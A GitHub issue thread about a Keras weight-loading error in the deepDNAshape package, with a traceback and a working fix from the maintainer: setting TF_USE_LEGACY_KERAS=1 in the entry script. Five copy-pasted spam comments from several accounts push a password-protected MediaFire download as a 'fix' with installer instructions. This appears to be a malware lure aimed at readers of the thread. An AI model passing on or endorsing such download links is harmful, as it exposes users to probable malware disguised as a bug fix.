### ISSUE TITLE
File format not supported

### ISSUE THREAD

**Issue by Huang-XN** [JinsenLi/deepDNAshape#3]
Hi there,

I have completed the installation and tried with example usages. But it gave me errors as follow:
```
I0000 00:00:1724827485.824542 1251510 cuda_executor.cc:1015] successful NUMA node read from SysFS had negative value (-1), but there must be at least one NUMA node, so returning NUMA node zero. See more at https://github.com/torvalds/linux/blob/v6.0/Documentation/ABI/testing/sysfs-bus-pci#L344-L355
Traceback (most recent call last):
  File "/home/huangxn/anaconda3/envs/deepDNAshape/bin/deepDNAshape", line 26, in <module>
    prediction = list(map(str, myPredictor.predict(args.feature, args.seq, args.layer)))
  File "/home/huangxn/anaconda3/envs/deepDNAshape/lib/python3.10/site-packages/deepDNAshape/predictor.py", line 103, in predict
    self.loadmodel(feature)
  File "/home/huangxn/anaconda3/envs/deepDNAshape/lib/python3.10/site-packages/deepDNAshape/predictor.py", line 86, in loadmodel
    model.load_weights(os.path.join(os.path.dirname(__file__), "models", feature))
  File "/home/huangxn/anaconda3/envs/deepDNAshape/lib/python3.10/site-packages/keras/src/utils/traceback_utils.py", line 122, in error_handler
    raise e.with_traceback(filtered_tb) from None
  File "/home/huangxn/anaconda3/envs/deepDNAshape/lib/python3.10/site-packages/keras/src/saving/saving_api.py", line 273, in load_weights
    raise ValueError(
ValueError: File format not supported: filepath=/home/huangxn/anaconda3/envs/deepDNAshape/lib/python3.10/site-packages/deepDNAshape/models/MGW. Keras 3 only supports V3 `.keras` and `.weights.h5` files, or legacy V1/V2 `.h5` files.
```
The command I used is `deepDNAshape --seq AAGGTT --feature MGW`

I have installed tf-keras with `pip install tf-keras~=2.16` and set environment `TF_USE_LEGACY_KERAS=1`

Hope you could help me fix it.

Thank you

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by JinsenLi** [comment]
It looks like the problem is that Keras still wants to use V3 instead of the legacy versions. Maybe you could edit the program at `"/home/huangxn/anaconda3/envs/deepDNAshape/bin/deepDNAshape"`, by adding `os.environ["TF_USE_LEGACY_KERAS"]="1"` after the line `import os`

**Comment by Huang-XN** [comment]
Thanks for your help.

I have tried with your instruction. It works.
